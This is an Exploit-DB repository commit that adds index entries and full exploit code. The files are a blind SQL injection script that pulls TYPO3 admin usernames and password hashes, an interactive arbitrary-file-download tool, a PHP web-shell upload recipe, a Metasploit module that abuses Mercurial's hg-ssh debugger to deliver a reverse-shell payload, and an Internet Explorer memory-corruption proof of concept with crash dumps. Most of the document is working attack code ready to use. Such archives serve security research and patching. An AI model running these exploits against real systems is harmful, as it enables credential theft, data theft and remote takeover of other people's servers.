DB: 2017-04-28

5 new exploits

Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption

Microsoft Office Word - Malicious Hta Execution (Metasploit)
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)

Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)
TYPO3 News Module - SQL Injection
Simple File Uploader - Arbitrary File Download
Easy File Uploader - Arbitrary File Upload
This commit is contained in:
Offensive Security 2017-04-28 05:01:19 +00:00
parent 0278b1993d
commit 72f98fab1c
6 changed files with 466 additions and 1 deletions

View file

@ -5478,6 +5478,7 @@ id,file,description,date,author,platform,type,port
41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15470,8 +15471,9 @@ id,file,description,date,author,platform,type,port
41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0
41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37789,3 +37791,6 @@ id,file,description,date,author,platform,type,port
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0

Can't render this file because it is too large.

139
platforms/php/webapps/41940.py Executable file
View file

@ -0,0 +1,139 @@
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli
#!/usr/bin/python3
# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#
import requests
import string
session = requests.Session()
session.proxies = {'http': 'localhost:8080'}
# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'
FULL_CHARSET = string.ascii_letters + string.digits + '$./'
def blind(field, table, condition, charset):
# We add 9 so that the result has two digits
# If the length is superior to 100-9 it won't work
size = blind_size(
'length(%s)+9' % field, table, condition,
2, string.digits
)
size = int(size) - 9
data = blind_size(
field, table, condition,
size, charset
)
return data
def select_position(field, table, condition, position, char):
payload = 'select(%s)from(%s)where(%s)' % (
field, table, condition
)
payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
payload, ord(char)
)
return payload
def blind_size(field, table, condition, size, charset):
string = ''
for position in range(size):
for char in charset:
payload = select_position(field, table, condition, position+1, char)
if test(payload):
string += char
print(string)
break
else:
raise ValueError('Char was not found')
return string
def test(payload):
response = session.post(
URL,
data=data(payload)
)
response = response.text
return response.index(PATTERN0) < response.index(PATTERN1)
def data(payload):
return {
'tx_news_pi1[overwriteDemand][order]': payload,
'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
'tx_news_pi1[search][subject]': '',
'tx_news_pi1[search][minimumDate]': '2016-01-01',
'tx_news_pi1[search][maximumDate]': '2016-12-31',
}
# Exploit
print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))

100
platforms/php/webapps/41943.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"
def banner():
print WHITE+""
print " ## ## "
print " ## ## "
print " ############## "
print " #### ###### #### "
print " ###################### "
print " ## ############## ## "
print " ## ## ## ## "
print " #### ####"
print ""
def details():
print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
print ""
def core_commands():
os.system('clear')
print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability
'''
def about():
os.system('clear')
print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
'''
def download():
other = 'a'
while other != 'n':
urltarget = str(raw_input(WHITE+'Target: '))
filename = str(raw_input(WHITE+'FileName: '))
filename = base64.b64encode(filename)
print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
final = urltarget+'download.php?id='+filename
r = requests.get(final)
print r.text
other = str(raw_input(WHITE+'Test other file? y/n: '))
if other == "n":
print "Type quit to exit. Bye!"
banner()
details()
option='0'
while option != 0:
option = (raw_input(RED+"pwn" + WHITE +" > "))
if option == "quit":
os.system('clear')
option = 0
elif option == "?":
core_commands()
elif option == "help":
core_commands()
elif option == "about":
about()
elif option == "download":
download()
elif option == "info":
about()
else:
print "Not a valid option! Need help? Press ? to display core commands " +GREEN

13
platforms/php/webapps/41944.txt Executable file
View file

@ -0,0 +1,13 @@
# Exploit Title: Easy File Uploader - Arbitrary File Upload
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
Drop file php (shell.php) to upload.
access to http://poc_site/fileFolder/shell.php and enjoy!

131
platforms/python/remote/41942.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
'Description' => %q{
This module takes advantage of custom hg-ssh wrapper implementations that don't
adequately validate parameters passed to the hg binary, allowing users to trigger a
Python Debugger session, which allows arbitrary Python code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'claudijd',
],
'References' =>
[
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "Apr 18 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def ssh_priv_key
File.read(datastore['SSH_PRIV_KEY_FILE'])
end
def exploit
factory = ssh_socket_factory
ssh_options = {
auth_methods: ['publickey'],
config: false,
use_agent: false,
key_data: [ ssh_priv_key ],
port: rport,
proxy: factory,
non_interactive: true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection is established.")
ssh.open_channel do |ch|
ch.exec "hg -R --debugger serve --stdio" do |ch, success|
ch.on_extended_data do |ch, type, data|
if data.match(/entering debugger/)
print_good("Triggered Debugger (#{data})")
ch.send_data "#{payload.encoded}\n"
else
print_bad("Unable to trigger debugger (#{data})")
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end

View file

@ -0,0 +1,77 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1118
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.
PoC:
===========================================================
-->
<!-- saved from url=(0014)about:internet -->
<style>
#details { transition-duration: 61s; }
</style>
<script>
function go() {
document.fgColor = "foo";
m.setAttribute("foo", "bar");
document.head.innerHTML = "a";
}
</script>
<body onload=go()>
<details id="details">
<summary style="transform: scaleY(4)">
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
<style></style>
<!--
===========================================================
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.
Debug info:
(d10.1504): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> r
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> k
# ChildEBP RetAddr
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b
-->